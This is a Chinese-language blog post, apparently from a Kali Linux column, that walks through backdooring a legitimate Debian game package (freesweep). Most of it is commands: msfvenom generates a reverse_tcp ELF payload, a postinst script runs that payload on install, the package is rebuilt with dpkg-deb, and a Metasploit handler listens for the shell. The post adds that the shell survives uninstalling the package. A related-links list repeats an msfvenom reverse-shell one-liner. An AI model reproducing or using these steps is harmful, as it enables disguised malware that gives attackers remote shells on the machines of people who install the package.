Msfvenom制作deb软件包生成后门

最新推荐文章于 2024-08-09 16:41:57 发布
最新推荐文章于 2024-08-09 16:41:57 发布
阅读量717 收藏 1
点赞数 2
分类专栏: Kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dreamsi_zhang/article/details/119676115
版权
本文详细介绍了如何通过下载正常软件包、复制到root目录、解压、插入恶意代码、生成软件包信息、创建带后门的deb软件包,并最终开启监听等待触发的过程。涉及apt下载、dpkg命令、msfvenom生成恶意payload及软件包篡改等技术。
摘要由CSDN通过智能技术生成

一、下载正常软件包

apt --download-only install freesweep //下载但不安装软件包freesweep
在这里插入图片描述

二、复制到root用户加目录下

为了便于后续操作,复制该软件包到root用户加目录下
默认apt下载后软件包位置路径为:/var/cache/apt/archives/
在这里插入图片描述

四、解压软件包

将deb包解压
在这里插入图片描述

五、生成恶意代码到软件源文件中

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp lhost=192.168.85.176 lport=5555 -b “\x00” -i 10 -f elf -o /root/free/usr/games/freesweep_sources
在这里插入图片描述

六、天见软件包信息

拓展:生成软件包时无论是payload的和软件包信息都需要选择能够在目标操作系统上执行的。
创建软件包信息目录,如不创建,则会导致软件包无法执行。
Package:freesweep
Version:1.0.1-1
Section:Games and Amusement
Priority:optional
Architecture:amd64
Maintainer:Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description:text-based minesweeper
在这里插入图片描述在特定路径下的特定文件中添加软件包的描述信息:
mkdir -p /root/free/DEBIAN && cd /root/free/DEBIAN
vim control
在这里插入图片描述

七、创建包含后门的deb软件包

请添加图片描述
┌──(root💀kali)-[~/free/DEBIAN]
└─# vim postinst
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
在这里插入图片描述
给postinst文件添加执行权限
chmod 755 postinst
在这里插入图片描述
重新生成带后门的deb软件包
dpkg-deb --build /root/free
在这里插入图片描述

九、开启监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.86.176
lhost => 192.168.86.176
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > exploit
在这里插入图片描述

十、对方下载并安装(触发)

访问http://192.168.85.176/free.deb //下载
dpkg -i free.deb //安装完成即触发
dpkg -r freesweep //卸载软件包
如发现恶意软件包被卸载,payload依旧正常运行,
exit退出即可

Dreamsi_zh
关注
专栏目录
Metasploit之多种后门生成
weixin_30790841的博客
08-30 458
本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe 参考“09-Metasploit之我的远程控制软件” li...
使用MSF-msfvenom制作恶意 deb 软件包来触发后门
枫梓林のBlog
04-21 583
使用MSF-msfvenom制作恶意 deb 软件包来触发后门 文章目录使用MSF-msfvenom制作恶意 deb 软件包来触发后门 实验环境 Kali Linux 2019.1a Kali Linux 2020.4 1.制作恶意软件包 制作恶意软件包使用 --download-only 方式下载软件包不进行安装 注:freeweep root@fengzilin53:~# apt --download-only install -y freesweep root@fengzilin53:~# m
【Linux】仓库使用yum/apt下载离线软件包&依赖
最新发布
小白鸽i的博客
08-09 315
linux仓库下载软件包
RMP、DEB系统相关安装包下载位置
cpf945的博客
08-28 861
1.清华大学的开源软件镜像站: https://mirrors.tuna.tsinghua.edu.cn/ 2.网易的: https://mirrors.edge.kernel.org/centos/ 3.centos相关的: http://vault.centos.org/5.5/os/x86_64/CentOS/ ...
无网络使用apt安装
u012796629的博客
03-31 2736
当一台主机无法使用网络时,我们可以使用另一台能联网的主机下载文件,然后拷贝过去安装,此处是wine官方提供的教程,其他程序可以参考使用 https://wiki.winehq.org/Ubuntu_zhcn 为了给没有网络环境的 Ubuntu 机器安装 Wine,您需要另外一个带有网络连接的 Ubuntu 机器(或虚拟机)来下载 Wine 的 .deb 安装包和其相关依赖。 其过程大致如下: 在有网络连接的机器上如上文所述:添加 WineHQ 源仓库并运行 apt update。 接着清理无关的缓
深入 APT 系统
四度空间
04-02 3940
APT 全称Advanced Package Tool, 系Debian的牛X工具集,功能强大,使用方便,APT是具有牛力的。:)A. 组件I. apt-cacheII. apt-get (尚有多种工具,如apt-cdrom apt-setup apt-key ...常用的就这两个)III. APT configure file     /etc/apt/apt.confIV.
DebBuilder 软件包生成
10-27
2. **构建阶段**: 使用 DebBuilder,开发者可以选择要生成软件包类型(deb, rpm, 或 ypk),然后执行相应的构建命令。工具会自动处理编译、打包等步骤。 3. **验证阶段**: 构建完成后,DebBuilder 会生成对应的...
postgres_exporter-deb:适用于Ubuntu的带有postgres_exporter的Deb软件包(16.04-18.04)
04-08
用于Ubuntu的带有Deb软件包(xenial,bionic,focus) 安装 apt-get update apt-get install gnupg2 apt-transport-https ca-certificates -y apt-key adv --keyserver hkp://keyserver.ubuntu....
RPM和DEB软件包打包教程.doc
11-07
在Linux系统中,RPM(Red Hat Package Manager)和DEBDebian Package)是两种主要的软件包管理工具,分别用于RHEL(Red Hat Enterprise Linux)、Fedora、CentOS等基于RPM的系统和Debian、Ubuntu等基于DEB的系统。...
deb.tmiland.com:用于Deb软件包的PPA存储库
04-05
用于deb软件包的PPA存储库: 用法 资料库 $ sudo curl -SsL -o /etc/apt/sources.list.d/tmiland.list https://deb.tmiland.com/debian/tmiland.list $ curl -SsL https://deb.tmiland.com/debian/KEY.gpg | sudo ...
deb软件包管理
09-04 972
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
在Ubuntu本地下载软件包并递归下载其所有依赖包
热门推荐
zgp210317的博客
10-02 2万+
由于最近需要在无互联网环境的ubuntu上安装软件包,而往往每个软件包都需要很多依赖项,依赖项还有各自的依赖项,手动查找下载非常麻烦。 在一些早期的ubuntu上连C编译器也没有预装,需要安装gcc等编译器才能进行下一步工作。 因此需要下载软件包及其所有递归的依赖项才能在无互联网的机子上顺利安装软件包。 有两种方法可以在 Ubuntu 及其衍生发行版中本地下载具有依赖项的软件包。 方法1: 要下载软件包而不安装它们,只需运行 $ sudo apt-get install --download-only &l
【Linux常用命令系列】 apt-get 由来命令选项示例详解
wang2leee的博客
02-11 1122
【Linux常用命令系列】 apt-get 由来命令选项示例详解
ubuntu系统只下载某个软件包而不安装它的命令
wzg2016的博客
12-30 2638
特点:下载单个deb文件。存储位置:当前shell所在位置。 或 特点:下载软件及其依赖包,默认的下载位置是:/var/chahe/apt/archive下面的指令可以查找一个deb包的依赖包 下面的指令可以只下载软件包而不安装 更多: 解压deb文件: 自定义编译deb文件: 安装deb文件: 参考:[1] ubuntu系统只下载某个软件包而不安装它的命令_apt只下载不安装-CSDN博客[2] https://blog.csdn.net/u012206617
apt 下载指定架构的包及离线安装的方法
weixin_40185941的博客
02-23 1616
【代码】apt 下载指定架构的包及离线安装的方法。
2022-渗透测试-制作恶意deb软件包来触发后门
保持微笑的博客
01-19 2428
目录 1.下载软件包 2.解压软件包 小知识1:kali更新或安装包的目录 小知识2:kali解压或安装操作 3.生成恶意代码到软件包源文件中 4.创建软件包信息目录 5.重新生成一个软件包 6 将deb提供下载 7 启动msfconsole 8.配置监听 10 目标机下载并安装带木马的deb软件 11.目标机安装软件 12 监控端获取到session 1.下载软件包 kali安装软件包 apt install 软件名称 kali下载软件包 apt --down..
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值